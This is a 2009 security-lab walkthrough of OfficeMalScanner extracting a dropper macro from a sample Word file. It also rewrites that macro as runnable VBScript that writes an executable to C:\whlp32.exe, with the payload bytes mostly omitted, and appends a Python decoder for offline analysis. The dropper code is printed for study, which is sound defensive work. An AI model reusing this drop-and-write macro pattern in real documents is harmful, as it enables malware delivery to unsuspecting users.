Blast's Security Lab
2 Aug 2009
Once upon a time... Ever since Office gained the embedded macros it is so proud of, macro viruses have existed, from the early W97 families to today's W03 and the like; macro viruses are still with us. Although the "mainstream" has shifted to hunting PDF 0days, Word remains a big target: many components mean many vulnerabilities. When you come across a suspicious file (according to the tool's author, the newer DOC format is XML-based, while the legacy binary DOC still keeps its macro code compressed inside the file), you hardly want to open it directly just to read its macro. So on the guru's site I found a tool: OfficeMalScanner (by Frank Boldewin). The paper under PAPERS on his site ships with two files, a DOC and a PPT, both containing macros; I'll use them for a small walkthrough, even though the PDF already covers it all, hoho.
Run the program without arguments and it prints its usage. "brute mode" is a great name...
D:\ToolBox\MalOfficeScan>OfficeMalScanner.exe
+------------------------------------------+
| OfficeMalScanner v0.43 |
| Frank Boldewin / www.reconstructer.org |
+------------------------------------------+
Usage:
------
OfficeMalScanner
Options:
scan - scan for several shellcode heuristics and encrypted PE-Files
info - dumps OLE structures, offsets+length and saves found VB-Macro code
Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found
Examples:
OfficeMalScanner evil.ppt scan brute debug
OfficeMalScanner evil.ppt scan
OfficeMalScanner evil.ppt info
Malicious index rating:
Executables: 4
Code : 3
STRINGS : 2
OLE : 1
----------------------------------------------------------------------------
I strongly suggest you to scan malicious files in a safe environment
like VMWARE, as this tool is written in C and might have exploitable bugs!
----------------------------------------------------------------------------
The usage text is self-explanatory. Load the DOC file in info mode:
D:\ToolBox\MalOfficeScan>OfficeMalScanner.exe C:\Test\0908\01\bill.doc info
+------------------------------------------+
| OfficeMalScanner v0.43 |
| Frank Boldewin / www.reconstructer.org |
+------------------------------------------+
[*] INFO mode selected
[*] Opening file C:\Test\0908\01\bill.doc
[*] Filesize is 289280 (0x46a00) Bytes
[*] Valid file format found.
-------------------------
[OLE Struct of: BILL.DOC]
-------------------------
1Table [TYPE: Stream - OFFSET: 0x1400 - LEN: 4096]
Macros [TYPE: Storage]
VBA [TYPE: Storage]
dir [TYPE: Stream - OFFSET: 0x462c0 - LEN: 508]
ThisDocument [TYPE: Stream - OFFSET: 0x5c00 - LEN: 262406]
_VBA_PROJECT [TYPE: Stream - OFFSET: 0x45800 - LEN: 2743]
PROJECT [TYPE: Stream - OFFSET: 0x46500 - LEN: 370]
PROJECTwm [TYPE: Stream - OFFSET: 0x4603c - LEN: 41]
CompObj [TYPE: Stream - OFFSET: 0x46680 - LEN: 106]
WordDocument [TYPE: Stream - OFFSET: 0x200 - LEN: 4142]
SummaryInformation [TYPE: Stream - OFFSET: 0x2400 - LEN: 4096]
DocumentSummaryInformation [TYPE: Stream - OFFSET: 0x2400 - LEN: 4096]
-----------------------------------------------------------------------------
VB-MACRO CODE WAS FOUND INSIDE THIS FILE!
The decompressed Macro code was stored here:
------> D:\ToolBox\MalOfficeScan\BILL.DOC-Macros
-----------------------------------------------------------------------------
The macro has already been carved out (the author says he uses an undocumented ntdll.dll function to decompress the data). Open the output file and take a look.
It is clearly in BAS (VB module) format:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const iSymbols = 45297
Const iBlockCount = 158
Dim b(1 To 158) As String
Private Sub Shellcode()
You can rename it with a .bas extension and run it in VB, but be careful not to let it execute the file it writes out (even though the written file looks corrupted).
You can also adapt the code to run under VBScript; a few things to watch for:
VBScript does not allow typed variable declarations; every variable is a Variant and gets its type at runtime.
dim a as string (wrong) dim a (right)
VBScript does not allow a variable name after Next; it matches the loop by itself.
next i (wrong) next (right)
VBScript has no Open/Put statements, so the final section:
Open NameOfLocalFile For Binary Access Read Write As DatNr
Put #1, , exefile
Close #1
must be rewritten to write the file some other way, e.g. with FileSystemObject (FSO).
The modified code below runs under VBScript (the three changes above applied: untyped Dim, bare Next, FSO instead of Open/Put) and writes the file to C:\whlp32.exe. One caveat: Chr() and a text-mode write both go through the system ANSI code page, so byte values 128 to 255 are not guaranteed to round-trip (especially on a DBCS locale such as GBK), which is one reason the dropped file can look corrupted; for byte-exact output ADODB.Stream in binary mode is the safer route.
Sub main()
    Const iSymbols = 45297
    Const iBlockCount = 158
    ' VBScript: no "As String"; arrays are 0-based, so an upper bound of 158 keeps b(1)..b(158) valid
    Dim b(158)
    b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|128|0|0|0|14|31|186|14|0|180|9|205|33|184|1|76|205|33|84|104|105|115|32|112|114|111|103|114|97|109|32|99|97|110|110|111|116|32|98|101|32|114|117|110|32|105|110|32|68|79|83|32|"
    '.... remaining blocks omitted for length
    Dim dumpfile, exefile, i
    ' Join all blocks into one pipe-separated string of decimal byte values
    For i = 1 To iBlockCount
        dumpfile = dumpfile & b(i)
    Next
    Dim parsearr
    parsearr = Split(dumpfile, "|", -1, vbTextCompare)
    ' Turn the first iSymbols values back into characters (the raw PE image)
    For i = 0 To iSymbols - 1
        exefile = exefile & Chr(parsearr(i))
    Next
    Dim NameOfLocalFile, PathOfWriteDir
    NameOfLocalFile = "whlp32.exe"
    'PathOfWriteDir = Environ("USERPROFILE")   ' Environ() does not exist in VBScript; the path stays hard-coded
    PathOfWriteDir = "c:\"
    ' VBScript has no Open/Put; write the file through FileSystemObject instead
    Dim fso, f
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateTextFile(PathOfWriteDir & NameOfLocalFile, True)
    f.Write exefile
    f.Close
End Sub
Call main
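Rather than renaming the module to .bas and letting VB run the dropper, the payload can be rebuilt offline: it is nothing more than the decimal byte values of a PE image, pipe-separated and spread over the string blocks b(1)..b(158). The Python decoder below is an added example and is not part of the original post or of OfficeMalScanner. It parses the `b(n) = "..."` assignments and the `Const` lines from the extracted macro text, joins the blocks in index order exactly as the macro does, and checks the MZ signature, e_lfanew and the "PE\0\0" signature of the result. The embedded sample is constructed from the page's own b(1) plus a made-up b(2) that finishes the DOS stub text; the other 156 blocks are not on the page, so the decoder reports the payload as truncated. A second, constructed minimal image is round-tripped through `encode_as_macro` to show the complete path.

```python
import re
import struct

# Constructed sample: the head of the macro module as OfficeMalScanner dumped it.
# b(1) is the page's own first block; b(2) is a constructed stand-in that finishes the
# DOS stub text. The remaining 156 blocks are not on the page, so this input is truncated.
PAGE_SAMPLE = r'''
Attribute VB_Name = "ThisDocument"
Const iSymbols = 45297
Const iBlockCount = 158
Dim b(1 To 158) As String
Private Sub Shellcode()
b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|128|0|0|0|14|31|186|14|0|180|9|205|33|184|1|76|205|33|84|104|105|115|32|112|114|111|103|114|97|109|32|99|97|110|110|111|116|32|98|101|32|114|117|110|32|105|110|32|68|79|83|32|"
b(2) = "109|111|100|101|46|13|13|10|36|0|"
End Sub
'''

ASSIGN_RE = re.compile(r'^\s*b\((\d+)\)\s*=\s*"([^"]*)"', re.M)
CONST_RE = re.compile(r'^\s*Const\s+(\w+)\s*=\s*(\d+)', re.M)


def decode_dropper_payload(vba_source):
    """Rebuild the PE that a macro of this family carries as pipe-separated decimal
    byte values spread over b(1)..b(n), without running the macro.
    Returns (payload_bytes, findings_dict)."""
    consts = {m.group(1): int(m.group(2)) for m in CONST_RE.finditer(vba_source)}
    blocks = {int(m.group(1)): m.group(2) for m in ASSIGN_RE.finditer(vba_source)}
    if not blocks:
        raise ValueError('no b(n) = "..." assignments found')
    # The macro concatenates b(1) & b(2) & ... and then Split()s on "|": the source order
    # of the assignments is irrelevant, only the index matters. A trailing "|" leaves an
    # empty token, which the macro never reaches; drop it.
    joined = "".join(blocks[i] for i in sorted(blocks))
    tokens = [t for t in joined.split("|") if t != ""]
    declared = consts.get("iSymbols", len(tokens))
    # Chr() is applied to exactly iSymbols values; if the source is cut short, decode
    # what is there and flag it. bytes() raises ValueError on any value outside 0..255.
    data = bytes(int(t) for t in tokens[:min(declared, len(tokens))])
    findings = {
        "blocks_found": len(blocks),
        "blocks_declared": consts.get("iBlockCount"),
        "bytes_declared": declared,
        "bytes_recovered": len(data),
        "truncated": len(data) < declared,
        "is_mz": data[:2] == b"MZ",
        "e_lfanew": None,
        "has_pe_header": False,
    }
    if findings["is_mz"] and len(data) >= 0x40:
        # e_lfanew lives at offset 0x3C of the DOS header and points at "PE\0\0"
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        findings["e_lfanew"] = e_lfanew
        findings["has_pe_header"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    return data, findings


def encode_as_macro(payload, per_block):
    """Emit the dropper's own layout (Const lines plus b(n) string blocks) from raw
    bytes. Used here only to round-trip a constructed image through the decoder."""
    tokens = [str(v) for v in payload]
    chunks = [tokens[i:i + per_block] for i in range(0, len(tokens), per_block)]
    lines = [f"Const iSymbols = {len(tokens)}",
             f"Const iBlockCount = {len(chunks)}",
             f"Dim b(1 To {len(chunks)}) As String"]
    for n, chunk in enumerate(chunks, start=1):
        lines.append('b(%d) = "%s|"' % (n, "|".join(chunk)))
    return "\n".join(lines)


def minimal_pe_image():
    """Constructed 0x40-byte DOS header whose e_lfanew points at a bare 'PE\\0\\0'
    signature: not a runnable executable, just enough for the header checks."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    payload, info = decode_dropper_payload(PAGE_SAMPLE)
    print(info)
    print(payload[:16].hex())
    img = minimal_pe_image()
    rebuilt, info2 = decode_dropper_payload(encode_as_macro(img, 16))
    print(rebuilt == img, info2)
```

Run it against the real `BILL.DOC-Macros` output by reading that file into `decode_dropper_payload`; the returned bytes can then be written to disk and handed to a PE parser or sandbox, with `truncated` telling you whether the macro text you recovered was complete.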